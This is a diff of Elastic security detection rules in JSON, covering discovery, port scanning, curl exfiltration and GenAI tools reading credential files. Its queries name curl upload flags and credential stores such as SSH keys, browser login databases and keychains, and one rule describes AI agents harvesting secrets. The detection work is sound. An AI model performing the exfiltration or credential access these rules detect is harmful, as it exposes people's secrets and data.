Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "b627cd12-dac4-11ec-9582-f661ea17fbcd_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json deleted file mode 100644 index 47b234701b3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Enrich process events with uname and other command lines that imply Linux system information discovery.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Linux System Information Discovery", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and (\n process.name: \"uname\" or (\n process.name: (\"cat\", \"more\", \"less\") and process.args: (\"*issue*\", \"*version*\", \"*profile*\", \"*services*\", \"*cpuinfo*\")\n )\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1082", - "name": "System Information Discovery", - "reference": "https://attack.mitre.org/techniques/T1082/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 5 - }, - "id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json deleted file mode 100644 index 58127c5f168..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "OneDrive Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating OneDrive Malware File Upload\n\nOneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. This proactive approach helps in identifying and mitigating potential breaches.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities.\n- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware.\n- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file.\n- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file.\n- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users.\n- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise.\n- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware.\n\n### False positive analysis\n\n- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe.\n- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool.\n- Shared files from trusted partners or vendors could be mistakenly identified as threats. Establish a process to verify these files with the sender and use exceptions for recurring, verified files.\n- Archived or compressed files that contain known safe content might be flagged due to their format. Decompress and scan the contents separately to confirm their safety before adding exceptions.\n- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization.\n- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice.\n- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files.\n- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution.\n- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred.\n- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats.", - "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json deleted file mode 100644 index c0482d25c0d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json +++ /dev/null @@ -1,121 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule defines a threshold-based approach to detect connection attempts from a single source to a large number of unique destination ports, while limiting the number of packets per port.", - "from": "now-9m", - "index": [ - "logs-network_traffic.*", - "packetbeat-*", - "filebeat-*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential SYN-Based Port Scan Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential SYN-Based Port Scan Detected\n\nSYN-based port scanning is a reconnaissance technique where attackers send SYN packets to multiple ports to identify open services. This method helps adversaries map network vulnerabilities for potential exploitation. The detection rule identifies such scans by flagging connection attempts from internal IPs to multiple ports with minimal packet exchange, indicating a low-risk reconnaissance activity.\n\n### Possible investigation steps\n\n- Review the source IP address involved in the alert to determine if it belongs to a known or authorized device within the network. Check for any recent changes or unusual activity associated with this IP.\n- Analyze the destination ports targeted by the scan to identify any patterns or specific services that may be of interest to the attacker. Determine if these ports are associated with critical or vulnerable services.\n- Examine historical logs to identify any previous scanning activity from the same source IP or similar patterns of behavior. This can help establish whether the activity is part of a larger reconnaissance effort.\n- Correlate the alert with other security events or alerts to assess if there is a broader attack campaign underway. Look for related alerts that might indicate subsequent exploitation attempts.\n- Investigate the timing and frequency of the scan attempts to understand if they coincide with other suspicious activities or known attack windows. This can provide context on the attacker's intent and urgency.\n- Assess the network's current security posture and ensure that appropriate defenses, such as firewalls and intrusion detection systems, are configured to mitigate potential exploitation of identified open ports.\n\n### False positive analysis\n\n- Internal network scanning tools or scripts used by IT teams for legitimate network mapping can trigger this rule. To manage this, create exceptions for known internal IP addresses or subnets used by IT for network discovery.\n- Automated monitoring systems or security appliances that perform regular port checks might be flagged. Identify these systems and exclude their IP addresses from the rule to prevent false positives.\n- Software updates or patch management systems that check multiple ports for service availability can be mistaken for a SYN-based port scan. Whitelist these systems to avoid unnecessary alerts.\n- Load balancers or network devices that perform health checks across multiple ports may trigger the rule. Exclude these devices from the rule to ensure accurate detection.\n- Development or testing environments where multiple port scans are part of routine operations can cause false positives. Implement exceptions for these environments to maintain focus on genuine threats.\n\n### Response and remediation\n\n- Isolate the affected internal IP address to prevent further reconnaissance or potential exploitation of identified open ports.\n- Conduct a thorough review of firewall and network access control lists to ensure that only necessary ports are open and accessible from internal networks.\n- Implement rate limiting on SYN packets to reduce the risk of successful port scanning and reconnaissance activities.\n- Monitor the network for any unusual outbound traffic from the affected IP address, which may indicate further malicious activity or data exfiltration attempts.\n- Escalate the incident to the security operations team for further analysis and to determine if additional network segments or systems are affected.\n- Update intrusion detection and prevention systems to enhance detection capabilities for similar SYN-based port scanning activities.\n- Review and update network segmentation policies to limit the exposure of critical services and systems to internal reconnaissance activities.", - "query": "event.action:network_flow and destination.port:* and network.packets <= 2 and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "network.packets", - "type": "long" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "bbaa96b9-f36c-4898-ace2-581acb00a409", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.port", - "value": 250 - } - ], - "field": [ - "destination.ip", - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 11 - }, - "id": "bbaa96b9-f36c-4898-ace2-581acb00a409_11", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json b/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json new file mode 100644 index 00000000000..94047daff7f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Data Exfiltration Through Curl", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Data Exfiltration Through Curl\n\nCurl is a command-line tool used for transferring data with URLs, commonly employed for legitimate data exchange tasks. However, adversaries can exploit curl to exfiltrate sensitive data by uploading compressed files to remote servers. The detection rule identifies suspicious curl usage by monitoring for specific command patterns and arguments indicative of data uploads, flagging abnormal activities for further investigation.\n\n### Possible investigation steps\n\n- Review the process command line to confirm the presence of suspicious arguments such as \"-F\", \"-T\", \"-d\", or \"--data*\" and check for any compressed file extensions like .zip, .gz, or .tgz being uploaded to an external server.\n- Investigate the parent process of the curl command to understand the context in which curl was executed, including the parent executable and its purpose.\n- Examine network logs to identify the destination IP address or domain to which the data was being uploaded, and assess whether it is a known or suspicious entity.\n- Check for any recent file creation or modification events on the host that match the compressed file types mentioned in the query, which could indicate data collection prior to exfiltration.\n- Correlate this event with other security alerts or logs from the same host to identify any patterns of behavior that might suggest a broader compromise or data exfiltration attempt.\n\n### False positive analysis\n\n- Legitimate data transfers using curl for system backups or data synchronization can trigger the rule. To manage this, identify and whitelist specific processes or scripts that are known to perform these tasks regularly.\n- Automated system updates or software installations that use curl to download and upload data might be flagged. Exclude these processes by verifying their source and adding them to an exception list if they are from trusted vendors.\n- Internal data transfers within a secure network that use curl for efficiency can be mistaken for exfiltration. Monitor the destination IP addresses and exclude those that are internal or known safe endpoints.\n- Developers or system administrators using curl for testing or development purposes may inadvertently trigger the rule. Educate these users on the potential alerts and establish a process for them to notify security teams of their activities to prevent unnecessary investigations.\n- Scheduled tasks or cron jobs that use curl for routine data uploads should be reviewed and, if deemed safe, added to an exception list to avoid repeated false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further data exfiltration and contain the threat.\n- Terminate any suspicious curl processes identified by the detection rule to stop ongoing data transfers.\n- Conduct a forensic analysis of the affected system to identify any additional malicious activities or compromised data.\n- Change credentials and access keys that may have been exposed or used during the incident to prevent unauthorized access.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further action.\n- Review and update firewall and network security rules to block unauthorized outbound traffic, especially to suspicious or unknown external servers.\n- Implement enhanced monitoring and logging for curl usage and similar data transfer tools to detect and respond to future exfiltration attempts promptly.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"ProcessRollup2\", \"start\") and\nprocess.name == \"curl\" and ?process.parent.executable != null and\n(\n process.args in (\"-T\", \"--upload-file\") or\n (\n (process.args in (\"-F\", \"-d\", \"--form\") or process.args like \"--data*\") and process.command_line like \"*@*\"\n )\n) and\n(\n process.command_line like (\"*http:*\", \"*https:*\", \"*ftp:*\", \"*ftps:*\") or\n process.command_line regex \".*[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}.*\"\n)\n", + "references": [ + "https://everything.curl.dev/usingcurl/uploads", + "https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be70614d-4295-473c-a953-582aef41c865", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "be70614d-4295-473c-a953-582aef41c865_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json deleted file mode 100644 index 7a78eba425a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies the use of built-in tools which adversaries may use to enumerate the system owner/user of a compromised system.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "System Owner/User Discovery Linux", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and \nprocess.name : (\"whoami\", \"w\", \"who\", \"users\", \"id\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "bf8c007c-7dee-4842-8e9a-ee534c09d205", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1033", - "name": "System Owner/User Discovery", - "reference": "https://attack.mitre.org/techniques/T1033/" - }, - { - "id": "T1069", - "name": "Permission Groups Discovery", - "reference": "https://attack.mitre.org/techniques/T1069/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 5 - }, - "id": "bf8c007c-7dee-4842-8e9a-ee534c09d205_5", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json new file mode 100644 index 00000000000..bf88e70e81b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Accessing Sensitive Files", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Accessing Sensitive Files\n\nThis rule detects GenAI tools accessing credential files, SSH keys, browser data, or shell configurations. While GenAI tools legitimately access project files, access to sensitive credential stores is unusual and warrants investigation.\n\n### Possible investigation steps\n\n- Review the GenAI process that triggered the alert to identify which tool is being used and verify if it's an expected/authorized tool.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review the types of sensitive files being accessed (credentials, keys, browser data, etc.) to assess the potential impact of credential harvesting or data exfiltration.\n- Check for other alerts or suspicious activity on the same host around the same time, particularly network exfiltration events.\n- Verify if the GenAI tool or extension is from a trusted source and if it's authorized for use in your environment.\n- Determine if the GenAI process accessed multiple sensitive directories in sequence, an indication of credential harvesting.\n- Check if the GenAI tool recently created or accessed AI agent config files, which may contain instructions enabling autonomous file scanning.\n- Review whether the access was preceded by an MCP server, LangChain agent, or background automation.\n\n### False positive analysis\n\n- Automated security scanning or auditing tools that leverage GenAI may access sensitive files as part of their normal operation.\n- Development workflows that use GenAI tools for code analysis may occasionally access credential files.\n\n### Response and remediation\n\n- Immediately review the GenAI process that accessed the documents to determine if it's compromised or malicious.\n- Review, rotate, and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool.\n- Investigate the document access patterns to determine the scope of potential data exfiltration.\n- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for access to sensitive files.\n", + "query": "file where event.action in (\"open\", \"creation\", \"modification\") and event.outcome == \"success\" and\n\n // GenAI process \n (\n process.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", \"jan\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) or\n // OpenClaw/Moltbot/Clawdbot via Node.js\n (process.name in (\"node\", \"node.exe\") and\n process.command_line like~ (\"*openclaw*\", \"*moltbot*\", \"*clawdbot*\"))\n ) and\n\n // Sensitive file paths\n (\n // Persistence via Shell configs\n file.name in (\".bashrc\", \".bash_profile\", \".zshrc\", \".zshenv\", \".zprofile\", \".profile\", \".bash_logout\") or\n\n // Credentials In Files \n file.name like~ \n (\"key?.db\", \n \"logins.json\", \n \"Login Data\", \n \"Local State\",\n \"signons.sqlite\",\n \"Cookies\", \n \"cookies.sqlite\",\n \"Cookies.binarycookies\", \n \"login.keychain-db\", \n \"System.keychain\", \n \"credentials.db\", \n \"credentials\", \n \"access_tokens.db\", \n \"accessTokens.json\", \n \"azureProfile.json\",\n \"RDCMan.settings\", \n \"known_hosts\", \n \"KeePass.config.xml\", \n \"Unattended.xml\")\n ) and not (\n host.os.type == \"windows\" and\n process.name : (\"claude.exe\", \"Claude\") and\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Claude\\\\Local State\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Claude_*\\\\LocalCache\\\\Roaming\\\\Claude\\\\Local State\")\n )\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0085", + "https://atlas.mitre.org/techniques/AML.T0085.001", + "https://atlas.mitre.org/techniques/AML.T0055", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c0136397-f82a-45e5-9b9f-a3651d77e21a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0085", + "Mitre Atlas: T0085.001", + "Mitre Atlas: T0055" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "c0136397-f82a-45e5-9b9f-a3651d77e21a_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json b/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json new file mode 100644 index 00000000000..e6111941559 --- /dev/null +++ 